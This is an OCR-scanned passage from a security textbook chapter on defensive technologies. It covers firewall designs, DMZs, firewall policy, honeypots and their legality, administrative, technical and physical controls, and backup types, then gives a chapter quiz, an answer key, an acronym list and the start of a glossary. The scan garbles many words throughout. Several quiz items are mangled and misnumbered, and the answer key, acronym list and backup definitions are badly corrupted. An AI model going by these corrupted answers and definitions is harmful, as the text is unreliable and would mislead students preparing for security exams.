w r ay is key to getting the correct deployment for your organization. The following
describes different options for firewall implementation:

Single packet filtering device — In this setup, the network is protected
by a single packet filtering device configured to permit or deny access.
Figure 15-4 illustrates this setup.

Single packet filtering

device.

CHAPTER 15 Defensive Technologies

359

Mu Hi -homed device — This device has multiple network interfaces that use rules to
determine how packets will be forwarded between interfaces. Figure 15-5 illustrates
a multi-homed device.

Screened host — A screened host is a setup where the network is protected by a
device that combines the features of proxy servers with packet filtering, Figure 15-6
Illustrates a screened host.

Demilitarized zone (DMZ) — A region of the network or zone that is sandwiched
between two firewalls. In this type of setup, the )\VA is set up to host publicly
available services. Figure 15-7 illustrates ti DMZ.

360

PART 3 Incident Response and Defensive Technologies

In an organization it is possible that some services such as a Web server, DNS, or other
resource may be required to be accessed by those outside the network. By its very nature
this setup makes it so these systems are more vulnerable to attack as the outside world
has access to them. In order to provide a means of protection, a DMZ is used to allow
outside access while at the same time providing some protection. A DMZ can allow these
hosts to be accessed by the outside world, although the outer lire wall in the DM2 provides
only limited connectivity to these resources. Additionally, even though those outside the
or this access is highly restricted being given only to specific hosts on the internal network.

To appreciate the utility of a firewall* consider the situation without this structure.
IT a single firewall were In place, the publicly accessible resources would be on the internal
network, which would mean that anyone outside the network gaining access to the
resources would in essence be on the internal network. Conversely, if the resources were
moved outside the firewall, there would be little if any protection for them as access would
be tough to control.

Authoring a Firewall Policy

Before you charge out and put a firewall in place, you need a plan thai detlnes how you
will configure the firewall and what is expected. This is the role of policy. The policy you
create will be the blueprint that dictates how the firewall is installed, configured, and
managed. It will make sure that you are addressing the correct problems in the right
way and that nothing unexpected is occurring.

For a firewall to be correctly designed and implemented, the firewall policy will be in
place ahead of time. The firewall policy will represent a small subset of the overall organi-
zational security policy. The firewall policy will fit into the overall company security policy
In some fashion and uphold the organization’s security goals, but enforce and support
those goals with the firewall device.

The firewall policy you ere rite will usually approach the problem of controlling traffic
In and out of an organization in two ways. The first option when creating a policy and the
firewall options that support it is to implicitly allow everything and explicitly deny only
those things that you do not wanL The other option is to implicitly deny everything and
allow only those things you know you need. The two options represent drastically different
methods of configuring the firewall. In the first option you are allowing everything unless
you say otherwise, while the second will not allow anything unless you explicitly say
otherwise. One is much more secure by default than the other.

Consider the option of implicit deny, which is the viewpoint that assumes all traffic is
denied, except that which has been identified as explicitly being allowed. Usually this turns
out to be much easier in the long run for the network/security administrator. For example,
visualize creating a list of all the ports Trojans use plus all the ports your applications
are authorized to use, and then creating rules to block each of them. Contrast that with
creating a list of what the users are permitted to use and granting them access to those
services and applications explicitly.

CHAPTER 15 Defensive Technologies

There are many different ways to approach the creation of firewall policy, but the ones
that tend to be used the most are known as Network Connectivity Policy, the Contracted
Worker Statement, and the Firewall Administrator Statement.

Network Connectivity Policy

This portion of the policy involves the types of devices and connections that are allowed
and will be permitted to be connected to the company-owned network. You can expect
to find information relating to the network operation system, types of devices, device
configuration, and communication types.

This policy arguably has the biggest impact on the effectiveness of the firewall;
this section is denning permitted network traffic and the shape it will take.

Included in this policy can be the following:

• Network scanning is prohibited except by approved personnel such as those

■ Certain types of network communication are allowed, such as FTP and the
Function Programming (FP) sites that are allowed to he accessed,

• Users may access the Web via port 80 as required.

■ Users may access e-mail on port 2 5 as required.

• Users may not access Network News Transfer Protocol CNNTP) on any port.

• Users may not run any form of chat software to the Internet, including, but not
limited to. AOL Instant Messenger, Yahoo Chat. Internet Relay Chat (IRC), ICQ,
and Microsoft Network (MSN) Chat.

• Antivirus software must be installed and running on all computers.

• A ntiv ir us u pd a tes a re re q u i re d o n a i I co m p u te r s .

• Antivirus updates are required on ail servers.

• No new hardware may be installed in any computer by anyone other than

• No unauthorized links to the Internet from any computer are allowed under
any circumstances.

This list is meant only to illustrate what you may find in these policies, but in practice
you can expect to see a much longer and more complex list that will vary depending
on the organization.

Contracted Worker Statement

This next policy is another that tends to be of use in larger organizations with large
numbers of contracted or temporary workers. These types of workers may very well
have enhanced connectivity requirements due to how they work. These individuals could,

362 PART 3 Incident Response and Defensive technologies

Some examples of items in Lhe com meted worker statement portion of the policy are:

• No contractors or temporary workers shall have access to unauthorized resources,

• No contractor or temporary worker shall he permitted to scan the network.

• No contractor or temporary worker may use FTP unless specifically granted
permission in writing.

Some organizations may not have a policy for the firewall administrator, but it is not
unheard of to have one. If yours is one that will require such a statement, the following
are some examples that may be contained in a firewall policy:

• The firewall administrator should be thoroughly trained on the iireivnll in use.
The firewall administrator must be aware of all the applications and services
authorized to access the network.

• The firewall administmtor will report to an entity such as the Chief Information
Officer.

• There will be a procedure in place for reaching the firewall admin istrator
in the event of a security incident

It is probably obvious that the firewall administrator is a clearly defined job role that
will require the proper rules and regulations placed upon it. It is not uncommon
for some organizations to have such a policy, but others will not It can be a benefit
in a large organization to know these items, and to have them written in the policy.

Firewall Policy

A firewall isn’t just configured in the way the administrator wants: it requires a policy to
be followed for consistent application. A firew T all policy is designed to lay out the rules on
what traffic is allowed and what is not. The policy will specifically define the IP addresses,
address ranges, protocol types, applications, and other content that will he evaluated
and granted or denied access to the network. The policy will give detailed information
on this traffic and in turn will be used as the template or guideline on what to specifically
configure on the firewall The policy will also provide guidance on how changes to traffic
and requirements are to he dealt with I how a change will be initiated to the firewall, who
is responsible, and so on). This practice, known as implicit deny, decreases the risk of
attack and reduces the volume of traffic carried on the organization’s networks. Because
of the dynamic nature of hosts, networks, protocols, and applications, implicit deny is
a more secure approach than permitting all traffic that is not explicitly forbidden,

Honeypots/Honeynets

This section discusses Lhe honey pot, n device that is unique among security devices.
The honey pot Is a computer that is configured to attract attackers to it, much like bears
to honey. In practice these devices wUI be placed in a location so that if an attacker is
able to get around the firew T a!i and other security devices, this system will act as a decoy
drawing attention away from more sensitive assets.

CHAPTER 15 Defensive Technologies

363

^ MOTE

An attacker that can detect
a honeypot could cause
serious problems for a security
professional. An attacker that
is able to uncover what is really
going on may be upset or angered
by the attempt and attack you
more aggressively as a “reward.”

Goals of Honeypots

What is the goal of a honeypot ? It can be twofold and will vary
depending on who is deploying iL The honeypot can act as a
decoy that looks attractive enough to an attacker that it draws
attention away from another resource that is more sensitive*
giving you more time to react to the threat. A honeypot can
also be used as a research tool by a company to gain insight into
the types and evolution of attacks and give them time to adjust
their strategies to deal with the problem.

The problem with honeypots / They need to look attractive,
but not so attractive that an attacker will know that they are

being observed and that they are attacking a noncritical resource. Ideally you want an
attacker to view the resource as vulnerable and not so out of place that they can detect
that it is a ruse. When you configure a honeypot* you are looking to leave out patches and
do minor configuration options someone might overlook and that an attacker will expect
to find with a little effort.

A honeypot is a single syslem put in place to attract an attack and buy you more
reaction time in the event of an attack. Under the right conditions, the honeypot will
assist you in detecting an attack earlier than you would normally and allow you to shut
it down before it reaches product ion systems,

A honeypot also can be used to support an additional goal: logging. By using a
honeypot correctly and observing the attacks that take place around it. you can build
a picture from the logs that will assist you in determining the types of attacks that you
will be facing. Once this information is gathered and a picture is built, you can start
to build a better picture of the attacks and then plan and defend accordingly.

Building upon the core goal of a honeypot, which is to look like an attractive target,
the next step is a honey net. which builds on the lessons and goals of the honeypot and
the goals from one vulnerable system to a group of vulnerable systems or a network.

Legal Issues

One of the issues that comes up when discussing honeypots and honeynets is the issue
of legality. Basically the question is if you put a honeypot out where someone can attack
it and does so, can you prosecute for a crime and would the honeypot be admissible as
evidence? Some people feel that this is a cut-and -dried issue of entrapment, but others
feel otherwise. Let s look at this a little more closely to understand the issue.

It has been argued that honeypots are entrapment because when you place one out
in public you are enticing someone to attack it — at least that’s the theory. In practice,
attorneys have argued this point a handful of times without success due to certain points
that have come up in other cases. Consider the police tactic of placing undercover female
officers on a street corner playing the role of a prostitute. When officers stand there they
simply wait and don’t talk to anyone about engaging in any sort of activity, but when
people approach the officer and ask about engaging in an illicit activity, they are arrested.

364 PART 3 Incident Response and Defensive Technologies

A honey pot would be the same situation. No one forces attackers to go after honey pots:
the attackers decide to do so on their own.

Role of Controls

Protecting the organization is a series of controls, a number of which you have experi-
enced. These controls fit into one of three key areas, each designed to provide one piece
of an overall comprehensive solution: administrative, physical, and technical.

Technical, administrative, and physical controls are mechanisms th&it will work together
to provide what is commonly known as defense in depth. This is the key detail: controls
working together to ensure that security is maintained. Defense in depth enhances security
by layering security measures, as in the design of a castle. A castle has moats, walls, gales,
archers, knights, and other defenses — which is what you are looking for with security
controls. By combining layers, you gain the advantage of multiple mechanisms to protect
your systems. Next you gain the advantage of having a hedge against failure, meaning
that if one layer or mechanism fails, you have others to fall back on.

Administrative controls are those that tit in the area of policy and procedure, What you
will find here are the rules that individuals and the company will follow to ensure a safe
and consistently secure working environment. Listed in this section are some of the more
common administrative controls that you would expect to see in practice:

• Implicit deny — Implicit deny is a rule or guideline that dictates that anything that

is not directly addressed in policy is automatically in a default deny state. This means
iki.li jJ you miss a selling or t’ontLijunuUm op! ion. in soft ware lor example, yuu
default to a state where no access is given. The opposite would be one where every
action is given access unless explicitly taken away, much less secure.

• Least privilege — Least privilege is the rule or guideline that states that individuals
will be given only the level of access that is appropriate for their spec i lie job role or
function. Anything that individuals do not need to perform their jobs is not given
to them.

Separation of duties — Separation of duties is a guideline that dictates that a user
will never be in a situation where he or she can complete a critical or sensitive task
alone. If one individual, for example, has the ability to evaluate, purchase, deploy,
and perform other tasks that individual has too much power, which should instead
he distributed among multiple people.

• Job rotation — This is the ability to rotate people periodically between job roles to
avoid them staying too long in a sensitive job role, The idea is to help prevent abuse
of power and to detect fraudulent behavior.

CHAPTER 15 Defensive Technologies

• Mandatory vacation — This technique is used to put employees on vacEition far
several days in order to give the company time to detect fraud or other types of
behaviors, With an employee gone for several days {usually a period of a work week)
the organization’s auditors and security personnel can investigate for any possible
discrepancies.

Privilege management — The process of using authentication and authori-
zation mechanisms to provide centralized or decentralized administration of user
and group access control. Privilege management needs to include an auditing
component to track privilege use and privilege escalation.

Technical Controls

Working in concert with administrative controls are technical controls that help enforce
security in the organization. The technical controls you use will work with your other
controls to create a robust security system. While there are a range of technical security
controls, a handful stand out as more common than others.
Preventive logical controls include:

• A cce ss co ntro I soft ware

• Matware solutions

• Security tokens

• Biometrics

• A cce ss co n tro I soft ware

• Antivirus software

Access control software is software designed to control access to and sharing of infor-
mation and applications. Software in this category can enforce access using one of three
methods: discretionary access control (DAC), role based access control (RBAC), and
mandatory access control (MAC).

• DAC — An access method that depends on the owner or author of data to manage
security. A prime example of DAC is the use of folder and file permissions. Under
])Af the owner/ ere a tor of data can grant write, read h and execute permissions as
necessary. The advantage of this security management model is that it facilitates
a quick and easy way of changing security settings; however, it has the problems
associated with being decentralized. The decentralization of security management
means that there could be inconsistent Eip plication of settings.

• RBAC — An access control method based on the role that an individual holds within
an organization. RBAC excels in environments in which a medium to large pool

of users exists. In this access control model users are assigned to roles based on
function and these are assigned permissions.

• MAC — A system that uses labels to determine the type and extent of access to a
resource and the permission level granted to each user. This type of access control
system requires more effort to manage than DAC or RBAC.

366

PART 3 Incident Response and Defensive Technologies

Mai wei re has became a considerable threat to organizations. Anti-maiware solutions are
essential tools in protecting the security of an organization with many organizations
moving towards robust centralized applications designed to safeguard against software.

Passwords are another technical control; in fact, they may be the most common type
of technical control in use. Interestingly enough, it may be the least effective, as users
have been known to post passwords on monitors, choose simple passwords, and do other
things that m ake passwords insecure. The idea is to use strong passwords as a preventive
technical control. Passwords should be supplemented with other controls and even
additional authentic tit ion mechanisms such as tokens or biometrics.

Security tokens are devices used to authenticate a user to a system or application.
These devices take the form of hardware devices such as cards, fobs, and other types
of devices. These types of devices can take many forms, including smart cards, key fobs,
or cards. Tokens are intended to provide an enhanced level of protection by making the
user present two forms of authentication — typically the token and a password or personal
identification number (PIN) — that identify him or her as the owner of a particular device.
If so equipped, the device will display a number on an LCD display which uniquely
identifies the user to the service, allowing the logon. The identification number for each
user is changed frequently at a predefined interval, which typically is one minute to
five minutes or longer.

These devices can be used by themselves, but they are frequently used in conjunction
with other controls such as passwords.

Biometrics is another type of access control mechanism. It provides the ability to
measure the physical characteristics of a human being. Characteristics measured here
include fingerprints, handprints, facial recognition, and similar methods.

Dttta backup is another form of control that is commonly used to safeguard assets.
Never overlook the fact that backing up critical systems isoneofthe most important
tools [hat you have at your disposal. Such procedures provide a vital protection against
hardware failure and other types of system failure.

Not all backups are created equal and the right backup makes all the difference:

• Full backups are the complete backups of all delta on a volume; they typically
take the longest to run.
• Incremental backups copy only those files and other data that have changed
since the last full or incremental backup. The advantage is that the time required
is much less, so it is done more quickly. The disadvantage is that these backups
take more time than a full backup to rebuild a system.

• Differential backups provide the ability to both reduce backup time and speed up
the restoration process. Differential backups copy from a volume that has changed
since the last full backup.

• CHAPTER 15 Defensive Technologies

367

Physical Controls

Physical security controls represent one of the most visible forms of security controls.
Controls in this category include barriers, guards, cameras, Jocks, and other types of
measures. Ultimately physical controls are designed to more directly protect the people,
facilities, and equipment than the other types of controls do.

Some of the preventative security controls include the following:

• Alternate power sources — Items such as backup generators, uninterrupted
power supplier, mill other similar devices

Flood management — Includes drains, ducting, and other mechanisms designed
to quickly evacuate water from an area

Fences — Structures that Eire designed to prevent access to sensitive facilities either
as a simple deterrent or as eui imposing physic til barrier

■ Human guards — Placing the human element on site a round sensitive areas with
the intention of providing an element of intelligence and the ability to react to
unanticipated situations

• Locks — Devices placed in locations to prevent easy access to areas that are sensitive
in nature

• Fire suppression systems — Covers devices such as sprinklers and lire extinguishers
designed to suppress or lessen the threat of fires

• Biometrics — Often these devices are generally used in conjunction with locks

• Location — Location provides some measure of protection by ensuring that
facilities are not Located where they may be prone to threats such as lire or flood.
Also addresses issues of placing facilities or assets in locations where they may
not easily be monitored.

Generally you can rely on your power company to provide your organization power
that is clean, consistent, and adequate, but this isn’t always the case. Anyone who
has worked in an office building has noticed a light flicker, if not a complete blackout
Alternate power sources safeguard against these problems to different degrees.

Hurricane Katrina showed us how devastating a natural disaster can be, but the disaster
wasn’t just the hurricane: it was the flood that came with it. You can’t necessarily stop a
flood, but you can exercise Hood management strategies to soften the impact. Choosing
a facility in a location that is not prone to flooding is one option that you have available.
Having adequate drainage and similar measures can also be of assistance. Finally,
mounting items such as servers several inches off of the floor can be a help as well

Fences are a physical control that represents a barrier that deters etisual trespassers.
While some organizations are witting to install tall fences with barbed wire and other features,
it is not always the case. Typically the fence will be designed to meet the security proiile of
the organization, so if your company is a bakery instead of one that performs duties vital
to national security, the fence design will be different as there are different items to protect.

E

368 PART 3 Incident Response and Defensive Technologies

Guards provide a security measure that can react to the unexpected as ihe human
element is uniquely able to do. When it comes down to it, technology can do quite a bit,
but it cannot replace the human element and brain. Additionally, once an intruder makes
the decision to breach security, guards are a quick responding defense against them
actually reaching critical assets.

The most common form of physical control is the ever-popular lock. Locks can take
many forms including key locks, cipher locks, warded locks, and other types of locks —
all designed to secure assets.

Fire suppression is a security measure that is physical and preventative. Fire
suppression cannot stop a iire, but it can prevent substantial damage to equipment,
facilities, and personnel.

CHAPTER SUMMARY

One of (he challenges you are going to face Is that of verification. It is a challenge because
the tools you will be using can do their job, but you need to be able to make sure they
are always functioning as designed. The controls that you put in place today may not be
equipped to deal with the problems that will arise tomorrow. Additionally your network
and the infrastructure that it comprises will become more complex with larger numbers
of employees going mobile and using advanced connection techniques such as VPNs.

All this complexity makes managing the security, while maintaining the usability and
capability of the network, much more d ill i cult than it would be otherwise. For all these
systems to work together effectively, a certain level of trust must be built into the system,
meaning that one system gives a certain level of credibility to another system. These
points are tilings that you must consider in order to properly secure your network.

Securing your network and infrastructure requires a mix of capabilities and techniques,
some of which have been introduced in this course. In the past, quite a bit of effort was
focused on the prevention of an attack, but what about those times where a new or
unanticipated attack gets through your defenses? Sure, you can prevent an attack by
using lirewalLs, policies, and other technologies, but there are other things that can help.
That’s where detection comes into play and where devices and technologies such as the
IDS and honeypots can assist you.

CHAPTER 15 Defensive Technologies

369

KEY CONCEPTS AND TERMS

Anomaly detection
Honeynet
Honey pot

Host-based intrusion detection
system (HIDS)

Intrusion

Intrusion detection
Misuse

Misuse detection

Net work-based intrusion
detection system (N IDS)

Signature Analysis

CHAPTER 15 ASSESSMENT

1. HIDS can monitor network activity.

A, True

B. False

1. A(n}.

:::oiiiKn :- ,i>.i.h. .\ oil owv IhjsL.

but cannot monitor an entire network.

A. NIDS

B. Firewall

C. HIDS

D. DM’Z

1. A{n).

has the ability to monitor

network activity.

A. NIDS
II, HIDS

C. Firewall

D. Router

can monitor changes to system files.

A. Hashes

B. HIDS
G, NIDS
D. Router

1. Signature-based IDSs look for known attack
patterns and types.

A. True

B. False

1. Anomaly -based IDSs look for deviations from
normal network activity.

A. True

B. False

1. An IPS is designed to lank for uud stop all ticks.

A. True

B. False

What is used lo monitor an NIDS?

A. Console

B. Sensor

C. Network
11 Router

1. What are deployed to detect activity
on the network?

A. Console

B. Sensors

C. Network
). Router

10.

can only monitor an individuiiL

network segment.

A. HIDS

B. NIDS

C. NAT

\1 Sensors

APPENDIX

A

CHAPTER 1

CHAPTER 2

CHAPTER 3

CHAPTER 4

CHAPTER 5

CHAPTER 6

CHAPTER 7

CHAPTER 8

CHAPTER 9

CHAPTER 10

Evolution of Hacking

L C 2. Wri Etc n authorisation J, Vulnerability 4. Scanning 5. D
h.U 7. B K.D 9.D WA)

TCP/IP Review

1, C 2.D 3.B 4.C S.plng 6.B ZD S.B 9. C 10. B
Cryptographic Concepts

LA 2.B 5,D 4, C 5* A 6, C 7,C H.D 9,B 10. A 11. A
12.A 13. A

Physical Security

LB 2.C 3vC 4. Bollard 5. A 6.C 7.D K. A 9. D 10. D 11.11
12. U 13. A

Footprinting Tools and Techniques

1, A 2. A 3.D 4, EDtiAR %.C fi.AHJN ?.C 8.B y.D 10. A
Port Scanning

I. A i.t: J. J) 4.U 5. A h.B 7. D H. A S. TOP 10. D 11. B
12.A 13. C

Enumeration and Computer System Hacking

LB 2.B 3.B 4. A 5. A h. B 7. Backdoor fi.A 9. A
10. Pa^nord cracker 1 1 . A 1 2 . C

Wireless Vulnerabilities

LB 2. A 3. Bluetooth 4. A 3-D ft. A 7- B K. A 9, A 10. C
Hacking Web Servers

LB 2. A l.B 4. B 5. B f>. A ;ind C ” C 8. B 9. B

Trojans and Backdoors

LB 2. A 3.C 4.C 5.C 6. B 7. B 8. Education 9. A 10. A

II. B 12. A B. Logic bombs 14. B

371

372

CHAPTER 11

CHAPTER 12

CHAPTER 13

CHAPTER 14

CHAPTER 15

Mai ware, Worms, and Viruses

1. A 2. A 5. 1) 4, B Covert channels A 7. A D

Sniffers, Session H acking,, and Denial of Service Attacks

I, A 2.B S.B 4. A 5. A h. Hijacking 7. MAC flooding H. A
<J.H 10. B

Linux, Live CDs, and Automated Assessment Tools

l.A 2. B i.A 4, A ^B B ?. A K. A 9. B It). A

Incident Response

1, Fault tolerance 2 . Chief information security officer (ClSO), information
security officer (ISO), Chief security officer (CSQ). Chief executive officer (CEO)>
Chief Information officer (ClOK Chief operating officer (COO) 3, A 4. B
S. livi lLl-j i ce 6 . C 7. Seconda ry ev Idenc c A Iternate site

Defensive Technologies

l.B 3. A IB S, A fi.A 7, A 8. A 9. B 10. D

APPENDIX

Standard Acronyms

3DES triple data encryption standard

ACD automatic call distributor

A E S Ad v a need Encryption Stan dard

ANSI American National Standards Institute

AP access point

API application programming interface

B2C ll LLSij I USS 1(J L O[]MI[[LLT

EBB Be t ier li u s i n es s U ll re a u

C2C consumer to consumer

CA certificate authority

CAP Certification and Accreditation
Professional

CAUCE Coalition Against Unsolicited Commercial
Email

C CC CERT Coo rdin a t ion Ccn tcr

C C N A Cisco Certi lied N et work Assoc late

CERT Com puter Emergency Response Tciwn

CFE Certified Fraud Examiner

C I S A Certified In formation Systems A udi t or

CISM Certified Information Security Manager

CISSP Certified Information System Security
Professional

CMIP common management Information
protocol

COPPA Children’s Online Privacy Protection

CRC cyclic redundancy check

C S I Computer Seen rity 1 nstit utc

CTI Computer Telephony Integration

DBMS database management sj stem

DDoS distributed denial of service

D E S Data E n c ry pt ion Sta ndard

DMZ dcinilttarisied /.one

D o S d e n i a I of service

DPI deep pacL-l inspection

0 H P disa ster recove ry plan

DSL digital su bsc rib er line

D S 5 Digital Signature S tandard

D S U d ata ser v ice u nit

EDI Electronic Data interchange

EIDE Enhanced IDP

FACTA Fair and Accurate Credit Transactions Act

FAR false acceptance rate

FBI Federal Bureau of Investigation

FDIC Federal Deposit Insurance Corporation

FEP front-end processor

FRCP Federal Rules of Civil Procedure

FRR false rejection rate

FT C federal Trade Comm ission

FTP ii I e tran sfcr protoeo I

GIAC (Global Information Assurance
Certification

GLBA Q ramm- Leach-B I i ley Act

H I D S host-based Intru s Jon detect ion system

HIPAA Health Insurance Portability and
Accountability Act

HIPS host-based intrusion prevention system

HTT P hy pertex t tr a nsfer protocol

HTTPS HTTP over Secure Socket Layer

HTML hy pertex t m a rkup langu age

I A B Internet Activities Board

IDEA international Data Encryption Algorithm

IDPS intrusion detection and prevention

IDS in l r u sion detection system

373

374 APPENDIX B I Standard Acronyms

IEEE Institute of Electrical and Electronics
I- ii^imriTs

InfoSec Information security

IPS Intrusion prevention system

IPSec IP Security

IPv4 Internet protocol version 4

IPv6 Internet protocol version fi

IRS Internal Revenue Service

(ISC) 2 International Information System
Security Certification Consortium

ISO international Organization for
Standardization

ISP in tern et ser v ice pr o v ider

ISS Internet security systems

ITRC identity Theft Resource Center

I V R In ieractlve vo ice respon se

LAN local area network

MAN metropolitan area network

MD5 Message Digest >

modem m od u lator demodulator

NFIC National Fraud Information Center

N I D S network intrusion det cct i on systc m

N I PS network Intrusion prevention system

NISI National institute of Standards and
Technology

N M S net wo rk m an age merit sy stem

OS operating system

OS I open system interconnection

PBX \m Wuic hi aneh exchange

PC I Fay men t Ca rd J n du stry

PGP Pretty (iOod Privacy

PKI public-key infrastructure

RAID redundant array of independent disks

RFC Request for Com men ts

RSA RivesL Shamir, and Adleman (algorithm)

SAN storage area network

S AN CP Security Analyst Network Connection
Profiler

SAP service access point

SCSI small computer system interface

SET Secure electronic transaction

S G C ser ver-gated c ryptog ra phy

SHA Ser Lire Ua-li Alt^onl Ilill

S-HTTP secure 11 TV t 1

SLA service level agreement

SMFA specific management functional area

5NMP simple network management protocol

SOX Sarbanes-Oxley Act of 2002 (also Sarbox)

SSCP Systems Security Certified Practitioner

SSL Secure Socket Layer

SSO single system sign-on

STP shielded twisted cable

TCP/IP Transmission Control Protocol/ Internet
Protocol

T C S E C Tr u st ed C< mi p u 1 c r S y si c m Evalu atlo n
Criteria

T FT P Triv ial File Tran sfer F rotoc ol

TNI Trusted Network Interpretation

LI D P I ; seH ) a 1 a Li ram Protocol

UPS uninterruptible power supply

UTP unshielded twisted cable

VLAN virtual local area network

VOIP Voice over internet Protocol!

VPN virtual private network

WAN wide area network

WLAN wireless local area network

WNIC w ire less network in terface card

W 3 C World Wide Web Con sortlum

WWW World Wide Web

Glossary of Key Terms

302.11 A family of standards that defines the basics
of wireless technologies and how they will interact
and [lull lion.

A

Active fingerprinting | A form of OS fingerprinting
that involves actively requesting Information from
the 1 urge I system. This means getting the in forma-
tion faster but also at greater risk of exposure than
Is the case in passive fingerprinting.

Active session hi